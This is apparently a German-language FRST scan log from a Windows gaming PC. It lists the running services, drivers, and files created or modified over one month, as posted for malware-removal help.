S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-05-16] (EasyAntiCheat Oy -> Epic Games, Inc) S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [584680 2022-05-01] (EasyAntiCheat Oy -> Epic Games, Inc.) S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.) S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation) R2 GameSDK Service; C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe [396520 2022-01-20] (ASUSTEK COMPUTER INCORPORATION -> ASUS Inc.) R3 iCUEDevicePluginHost; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUEDevicePluginHost.exe [440936 2022-03-17] (Corsair Memory, Inc. -> Corsair) R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11523704 2022-06-11] (Logitech Inc -> Logitech, Inc.) R2 LightingService; C:\Program Files (x86)\LightingService\LightingService.exe [3835360 2022-03-10] (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-05-27] (Electronic Arts, Inc. -> Electronic Arts) R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-05-27] (Electronic Arts, Inc. -> Electronic Arts) S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [1908688 2022-06-16] (Rockstar Games, Inc. -> Rockstar Games) R2 ROG Live Service; C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe [6304432 2022-03-21] (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) R2 SCC-Dienst; C:\Windows\cc\ctlsysmgr.exe [7835528 2022-05-24] (Salfeld Computer GmbH -> Salfeld Computer) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6207704 2022-06-17] (Microsoft Windows Publisher -> Microsoft Corporation) S3 ucldr_Crowz_ST; C:\Program Files\Common Files\Wellbia.com\ucldr_Crowz_ST.exe [5534960 2022-06-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.) S2 upccsvc; C:\Windows\upcc\upccsvc.exe [1683616 2019-02-06] (Salfeld Computer GmbH -> Salfeld GmbH) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe [3116848 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe [133544 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WMIRegistrationService; C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe [538736 2021-11-30] (Intel Corporation -> Intel Corporation) S2 edgeupdate; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc [X] S3 edgeupdatem; "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc [X] R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem ===================== Treiber (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) S3 AcxHdAudio; C:\Windows\System32\drivers\AcxHdAudio.sys [557056 2022-06-17] (Microsoft Windows -> Microsoft Corporation) S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R1 Asusgio2; C:\Windows\system32\drivers\AsIO2.sys [34384 2022-02-10] (ASUSTeK Computer Inc. -> ) R1 Asusgio3; C:\Windows\system32\drivers\AsIO3.sys [43168 2022-03-09] (ASUSTeK Computer Inc. -> ) S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [507904 2021-11-04] (Microsoft Corporation) [Datei ist nicht signiert] S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [180224 2021-11-04] (Microsoft Corporation) [Datei ist nicht signiert] S3 BTHMODEM; C:\Windows\System32\drivers\bthmodem.sys [98304 2021-06-05] (Microsoft Corporation) [Datei ist nicht signiert] S3 CorsairGamingAudioService; C:\Windows\System32\drivers\CorsairGamingAudio64.sys [61976 2022-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R2 CorsairLLAccessC2D033F14715AA7325305EA42FBFC65BF867CC1D; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairLLAccess64.sys [21752 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R3 CorsairVBusDriver; C:\Windows\System32\drivers\CorsairVBusDriver.sys [46600 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) R3 CorsairVHidDriver; C:\Windows\System32\drivers\CorsairVHidDriver.sys [22536 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) R3 cpuz153; C:\Windows\temp\cpuz153\cpuz153_x64.sys [36864 2022-06-19] (Microsoft Windows Hardware Compatibility Publisher -> CPUID) R1 CTIAIO; C:\Windows\system32\drivers\CtiAIo64.sys [31808 2022-04-08] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.) S3 e2f68; C:\Windows\System32\drivers\e2f68.sys [485376 2021-06-01] (Microsoft Windows -> Intel Corporation) S3 Hsp; C:\Windows\System32\drivers\Hsp.sys [111960 2022-05-13] (Microsoft Windows -> Microsoft Corporation) R3 iaLPSS2_GPIO2_ADL; C:\Windows\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_e11257f05c0c2f89\iaLPSS2_GPIO2_ADL.sys [139928 2021-07-29] (Intel Corporation -> Intel Corporation) R3 iaLPSS2_I2C_ADL; C:\Windows\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_778b19a5f4d49cba\iaLPSS2_I2C_ADL.sys [202896 2021-07-29] (Intel Corporation -> Intel Corporation) R0 iaStorVD; C:\Windows\System32\drivers\iaStorVD.sys [1587376 2021-10-19] (Intel Corporation -> Intel Corporation) R4 IOMap; C:\Windows\system32\drivers\IOMap64.sys [46728 2022-03-21] (ASUSTEK COMPUTER INC. -> ASUSTeK Computer Inc.) S3 logi_generic_hid_filter; C:\Windows\system32\drivers\logi_generic_hid_filter.sys [55624 2022-05-13] (Logitech Inc -> Logitech) R3 logi_joy_bus_enum; C:\Windows\system32\drivers\logi_joy_bus_enum.sys [33528 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) S3 logi_joy_hid_filter; C:\Windows\system32\drivers\logi_joy_hid_filter.sys [56656 2022-05-13] (Logitech Inc -> Logitech) S3 logi_joy_hid_lo; C:\Windows\system32\drivers\logi_joy_hid_lo.sys [41280 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) S3 logi_joy_vir_hid; C:\Windows\system32\drivers\logi_joy_vir_hid.sys [21704 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) R3 logi_joy_xlcore; C:\Windows\system32\drivers\logi_joy_xlcore.sys [62904 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [17424 2020-01-19] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd) R1 netfltcc; C:\Windows\System32\drivers\netfltcc.sys [95752 2019-08-21] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider) R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation) R3 ROGKB; C:\Windows\System32\DriverStore\FileRepository\rogkb.inf_amd64_3da3a8b71ac46a0e\ROGKB.sys [37856 2022-01-12] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider) R3 ROGMS; C:\Windows\System32\DriverStore\FileRepository\rogms.inf_amd64_50ecaa1d662a0a48\ROGMS.sys [36264 2022-01-12] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider) S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49600 2022-04-08] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [443664 2022-04-08] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [90384 2022-04-08] (Microsoft Windows -> Microsoft Corporation) S3 xhunter1; C:\Windows\xhunter1.sys [1431256 2022-06-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2022-06-20 09:41 - 2022-06-20 09:41 - 000032680 _____ C:\Users\Pauli\Desktop\FRST.txt 2022-06-20 09:40 - 2022-06-20 09:41 - 000000000 ____D C:\FRST 2022-06-20 09:39 - 2022-06-20 09:40 - 002369024 _____ (Farbar) C:\Users\Pauli\Desktop\FRST64.exe 2022-06-20 09:16 - 2022-06-20 09:16 - 000000000 ___HD C:\$WinREAgent 2022-06-19 21:42 - 2022-06-19 21:42 - 000001164 _____ C:\Users\Pauli\Desktop\Microsoft Flight Simulator.lnk 2022-06-19 21:10 - 2022-06-19 21:43 - 000002488 _____ C:\Users\Pauli\Desktop\Persönlich - Edge.lnk 2022-06-18 21:34 - 2022-06-18 21:34 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\HelloGames 2022-06-18 18:36 - 2022-06-18 18:36 - 000000223 _____ C:\Users\Pauli\Desktop\Days Gone.url 2022-06-17 14:01 - 2022-06-17 14:01 - 000614400 _____ C:\Windows\system32\TextInputMethodFormatter.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000557056 _____ (Microsoft Corporation) C:\Windows\system32\PhotoScreensaver.scr 2022-06-17 14:01 - 2022-06-17 14:01 - 000524288 _____ C:\Windows\system32\AssignedAccessCsp.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000485376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhotoScreensaver.scr 2022-06-17 14:01 - 2022-06-17 14:01 - 000335872 _____ C:\Windows\system32\Windows.Management.InprocObjects.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000299008 _____ C:\Windows\system32\EsclScan.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000180224 _____ C:\Windows\system32\EsclProtocol.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000167936 _____ C:\Windows\system32\DeviceUpdateCenterCsp.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000057344 _____ C:\Windows\system32\uwfservicingapi.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000015042 _____ C:\Windows\system32\DrtmAuthTxt.wim 2022-06-16 10:33 - 2022-06-16 10:33 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Landfall 2022-06-13 16:25 - 2022-06-14 14:01 - 000000000 ____D C:\Users\Pauli\AppData\Local\Fallout4 MS 2022-06-12 18:11 - 2022-06-12 18:11 - 000001911 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Setup.lnk 2022-06-12 18:11 - 2022-06-12 18:11 - 000000000 ____D C:\Windows\ShellServiceLog 2022-06-12 14:41 - 2022-06-12 14:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logi 2022-06-12 14:41 - 2022-06-12 14:41 - 000000000 ____D C:\Program Files\LGHUB 2022-06-11 20:24 - 2022-06-11 20:24 - 000000000 ____D C:\Users\Pauli\AppData\Local\ReadyOrNot 2022-06-11 20:11 - 2022-06-11 20:11 - 000000223 _____ C:\Users\Pauli\Desktop\Ready or Not.url 2022-06-10 12:57 - 2022-06-10 12:57 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\IO Interactive 2022-06-09 19:35 - 2022-06-09 19:35 - 000000000 ____D C:\Program Files (x86)\Windows Kits 2022-06-09 19:35 - 2022-06-09 19:35 - 000000000 ____D C:\Program Files (x86)\Microsoft GameInput 2022-06-06 20:49 - 2022-06-06 20:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Kindersicherung 2022-06-06 20:10 - 2022-06-06 20:11 - 000000000 ____D C:\AdwCleaner 2022-06-06 20:09 - 2022-06-06 20:10 - 000000000 ____D C:\ProgramData\HitmanPro 2022-06-06 20:09 - 2022-06-06 20:09 - 000000000 ____D C:\Program Files\HitmanPro 2022-06-06 19:58 - 2022-06-10 18:08 - 000001244 _____ C:\Users\Pauli\Desktop\Roblox Studio.lnk 2022-06-06 18:10 - 2022-06-06 18:10 - 000000000 ____D C:\Users\Pauli\AppData\Local\IO Interactive 2022-06-06 15:24 - 2022-06-06 15:24 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\EasyAntiCheat 2022-06-05 16:47 - 2022-06-10 18:08 - 000001421 _____ C:\Users\Pauli\Desktop\Roblox Player.lnk 2022-06-05 16:47 - 2022-06-10 18:08 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox 2022-06-05 16:47 - 2022-06-05 22:19 - 000000000 ____D C:\Users\Pauli\AppData\Local\Roblox 2022-06-05 16:47 - 2022-06-05 22:16 - 000000256 _____ C:\Users\Pauli\AppData\LocalLow\rbxcsettings.rbx 2022-06-05 15:22 - 2022-06-05 15:22 - 000000000 ____D C:\Program Files\Common Files\Wellbia.com 2022-06-04 20:30 - 2022-06-04 20:30 - 000004641 ____R C:\Windows\system32\WindowsUpdater1.ps1 2022-06-04 20:30 - 2022-06-04 20:30 - 000003586 _____ C:\Windows\system32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2 2022-06-04 20:30 - 2022-06-04 20:30 - 000003512 _____ C:\Windows\system32\Tasks\MicrosoftWindowsUpdaterTask_PR1 2022-06-04 15:54 - 2022-06-04 22:32 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\discord 2022-06-04 15:54 - 2022-06-04 22:19 - 000000000 ____D C:\Users\Pauli\AppData\Local\Discord 2022-06-04 15:54 - 2022-06-04 15:54 - 000002227 _____ C:\Users\Pauli\Desktop\Discord.lnk 2022-06-04 15:54 - 2022-06-04 15:54 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc 2022-06-04 15:49 - 2022-06-04 15:50 - 000000000 ____D C:\_backup 2022-06-02 19:32 - 2022-06-02 19:33 - 000000000 ____D C:\ProgramData\EA Logs 2022-06-02 19:32 - 2022-06-02 19:32 - 000000000 ____D C:\ProgramData\PopCap Games 2022-06-02 19:32 - 2022-06-02 19:32 - 000000000 ____D C:\ProgramData\EA Core 2022-05-31 19:52 - 2022-05-31 19:52 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Curve Digital 2022-05-31 19:31 - 2022-06-08 17:39 - 000000000 ____D C:\Users\Pauli\AppData\Local\Ubisoft Game Launcher 2022-05-31 19:31 - 2022-05-31 19:31 - 000001323 _____ C:\Users\Pauli\Desktop\Ubisoft Connect.lnk 2022-05-31 19:31 - 2022-05-31 19:31 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft 2022-05-31 19:31 - 2022-05-31 19:31 - 000000000 ____D C:\ProgramData\Ubisoft 2022-05-31 19:30 - 2022-05-31 19:30 - 000000000 ____D C:\Program Files (x86)\Ubisoft 2022-05-31 19:15 - 2022-06-06 20:44 - 000000085 _____ C:\Windows\wininit.ini 2022-05-31 19:02 - 2022-06-19 20:47 - 000000990 __RSH C:\ProgramData\ntuser.pol 2022-05-31 18:35 - 2022-05-31 18:35 - 000000000 ____D C:\Windows\system32\Tasks\Safer-Networking 2022-05-31 18:34 - 2022-06-06 20:48 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2022-05-31 18:34 - 2022-06-06 20:44 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy 2022-05-31 18:34 - 2022-05-31 18:34 - 000000000 ____D C:\Users\Pauli\AppData\Local\BraveSoftware 2022-05-31 18:34 - 2022-05-31 18:34 - 000000000 ____D C:\Program Files (x86)\BraveSoftware 2022-05-31 18:22 - 2022-05-31 18:22 - 000000000 ____D C:\Users\Pauli\AppData\Local\mbam 2022-05-30 19:25 - 2022-06-19 21:32 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Ninja Kiwi 2022-05-30 17:00 - 2022-05-30 17:00 - 000000000 ____D C:\Users\Pauli\AppData\Local\GSS2 2022-05-29 17:52 - 2022-05-29 17:52 - 000004350 _____ C:\Users\Pauli\AppData\Local\2613946761 2022-05-29 17:51 - 2022-05-29 17:52 - 000000000 ____D C:\Users\Pauli\AppData\Local\Sniper Elite 5 2022-05-29 16:59 - 2022-05-21 05:26 - 001905912 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe 2022-05-29 16:59 - 2022-05-21 05:26 - 001905912 _____ C:\Windows\system32\vulkaninfo.exe 2022-05-29 16:59 - 2022-05-21 05:26 - 001478384 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe 2022-05-29 16:59 - 2022-05-21 05:26 - 001478384 _____ C:\Windows\SysWOW64\vulkaninfo.exe 2022-05-29 16:59 - 2022-05-21 05:26 - 001467080 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001432304 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001432304 _____ C:\Windows\system32\vulkan-1.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001209408 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001145584 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001145584 _____ C:\Windows\SysWOW64\vulkan-1.dll 2022-05-29 16:59 - 2022-05-21 05:23 - 000587336 _____ C:\Windows\system32\nvofapi64.dll 2022-05-29 16:59 - 2022-05-21 05:23 - 000460496 _____ C:\Windows\SysWOW64\nvofapi.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 002120896 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 001603144 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 001530456 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 001177312 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 000730320 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 000712416 _____ (NVIDIA Corporation) C:\Windows\system32\nvidia-smi.exe 2022-05-29 16:59 - 2022-05-21 05:21 - 006964824 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 006226640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 005100752 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 002932952 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 000582712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 000457944 _____ (NVIDIA Corporation) C:\Windows\system32\nvdebugdump.exe 2022-05-29 16:59 - 2022-05-21 05:20 - 005730880 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll 2022-05-29 16:59 - 2022-05-21 05:19 - 000851136 _____ (NVIDIA Corporation) C:\Windows\system32\MCU.exe 2022-05-29 16:59 - 2022-05-20 02:51 - 000089337 _____ C:\Windows\system32\nvinfo.pb 2022-05-27 15:04 - 2022-05-27 15:04 - 000000000 ____D C:\Users\Pauli\AppData\Local\MW5Mercs 2022-05-24 18:11 - 2022-05-24 18:11 - 000000222 _____ C:\Users\Pauli\Desktop\Cat Goes Fishing.url 2022-05-24 18:11 - 2022-05-24 18:11 - 000000000 ____D C:\Users\Pauli\AppData\Local\Cat_Goes_Fishing 2022-05-23 14:52 - 2022-05-23 14:52 - 000466456 _____ (Creative Labs) C:\Windows\system32\wrap_oal.dll 2022-05-23 14:52 - 2022-05-23 14:52 - 000444952 _____ (Creative Labs) C:\Windows\SysWOW64\wrap_oal.dll 2022-05-23 14:52 - 2022-05-23 14:52 - 000122904 _____ (Portions (C) Creative Labs Inc. and NVIDIA Corp.) C:\Windows\system32\OpenAL32.dll 2022-05-23 14:52 - 2022-05-23 14:52 - 000109080 _____ (Portions (C) Creative Labs Inc. and NVIDIA Corp.) C:\Windows\SysWOW64\OpenAL32.dll 2022-05-23 14:52 - 2022-05-23 14:52 - 000000000 ____D C:\Users\Pauli\AppData\Local\Dovetail Games 2022-05-23 14:52 - 2022-05-23 14:52 - 000000000 ____D C:\Program Files (x86)\OpenAL ==================== Ein Monat (geänderte) ================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2022-06-20 09:40 - 2022-04-08 20:49 - 000000000 ____D C:\Windows\dl 2022-06-20 09:33 - 2022-04-08 20:41 - 000000000 ____D C:\Program Files (x86)\Steam 2022-06-20 09:18 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SystemTemp 2022-06-20 09:18 - 2021-06-05 14:01 - 000000000 ____D C:\Windows\CbsTemp 2022-06-20 09:17 - 2022-04-08 20:49 - 000000000 ____D C:\Windows\cc 2022-06-20 09:16 - 2022-04-08 19:27 - 000000000 ____D C:\ProgramData\NVIDIA 2022-06-20 09:16 - 2021-06-05 14:10 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2022-06-19 22:39 - 2022-04-08 19:24 - 001750916 _____ C:\Windows\system32\PerfStringBackup.INI 2022-06-19 22:39 - 2021-06-05 19:52 - 000757210 _____ C:\Windows\system32\perfh007.dat 2022-06-19 22:39 - 2021-06-05 19:52 - 000156454 _____ C:\Windows\system32\perfc007.dat 2022-06-19 22:39 - 2021-06-05 14:09 - 000000000 ____D C:\Windows\INF 2022-06-19 21:56 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\AppReadiness 2022-06-19 21:51 - 2022-04-08 19:30 - 000000000 ____D C:\Users\Pauli\AppData\Local\D3DSCache 2022-06-19 21:46 - 2022-04-08 19:30 - 000000000 ____D C:\Users\Pauli\AppData\Local\Packages 2022-06-19 21:45 - 2022-04-08 21:45 - 000000000 ____D C:\XboxGames 2022-06-19 21:45 - 2021-06-05 14:10 - 000000000 ___HD C:\Program Files\WindowsApps 2022-06-19 21:41 - 2022-04-08 19:28 - 000000000 ____D C:\ProgramData\Packages 2022-06-19 21:34 - 2022-04-08 21:54 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2022-06-19 21:27 - 2022-04-08 19:19 - 001223640 _____ () C:\Windows\system32\wpbbin.exe 2022-06-19 21:27 - 2022-04-08 19:19 - 001164992 _____ C:\Windows\system32\AsusUpdateCheck.exe 2022-06-19 21:27 - 2022-04-08 19:19 - 000012288 ___SH C:\DumpStack.log.tmp 2022-06-19 21:27 - 2022-04-08 19:19 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2022-06-19 21:22 - 2022-04-08 19:20 - 000001623 _____ C:\Windows\system32\config\VSMIDK 2022-06-19 21:22 - 2022-04-08 19:19 - 000000000 ____D C:\Windows\system32\SleepStudy 2022-06-19 21:22 - 2021-06-05 14:01 - 000524288 _____ C:\Windows\system32\config\BBI 2022-06-19 21:21 - 2021-06-05 14:18 - 000233808 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vpcivsp.sys 2022-06-19 21:21 - 2021-06-05 14:18 - 000069960 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vkrnlintvsc.sys 2022-06-19 21:21 - 2021-06-05 14:18 - 000069952 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vkrnlintvsp.sys 2022-06-19 21:19 - 2022-04-08 19:32 - 000003588 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1424437550-2087844553-323541659-1001 2022-06-19 21:19 - 2022-04-08 19:32 - 000003378 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1424437550-2087844553-323541659-1001 2022-06-19 21:19 - 2022-04-08 19:32 - 000002395 _____ C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2022-06-19 21:09 - 2022-04-08 19:19 - 000292792 _____ C:\Windows\system32\FNTCACHE.DAT 2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files\Windows Photo Viewer 2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___SD C:\Windows\SysWOW64\F12 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___SD C:\Windows\system32\F12 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___RD C:\Windows\ImmersiveControlPanel 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\vi-VN 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\oobe 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\lv-LV 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\lt-LT 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\id-ID 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\gl-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\eu-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\et-EE 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\es-MX 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\Dism 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\ca-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SystemResources 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\vi-VN 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\oobe 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\lv-LV 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\lt-LT 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\id-ID 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\gl-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\eu-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\et-EE 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\es-MX 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\Dism 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\DDFs 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\ca-ES 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\appraiser 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\ShellExperiences 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\ShellComponents 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\PolicyDefinitions 2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\bcastdvr 2022-06-19 15:44 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\WeMod 